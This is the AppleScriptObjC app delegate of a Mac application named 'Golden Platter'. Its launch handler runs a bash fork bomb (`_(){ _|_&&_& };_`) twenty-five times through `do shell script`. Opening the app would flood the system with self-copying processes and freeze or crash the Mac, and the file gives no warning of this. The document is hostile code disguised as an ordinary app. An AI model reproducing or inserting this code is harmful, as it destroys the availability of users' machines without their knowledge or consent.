--
--  AppDelegate.applescript
--  Golden Platter
--
--  Created by Patrick Hart on 1/7/16.
--  Copyright © 2016 Urbicapus Studios. All rights reserved.
--

script AppDelegate
	property parent : class "NSObject"
	
	-- IBOutlets
	-- property theWindow : missing value
	
	on applicationWillFinishLaunching_(aNotification)
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
        do shell script "_(){ _|_&&_& };_"
	end applicationWillFinishLaunching_
	
	on applicationShouldTerminate_(sender)
		return current application's NSTerminateNow
	end applicationShouldTerminate_
	
end script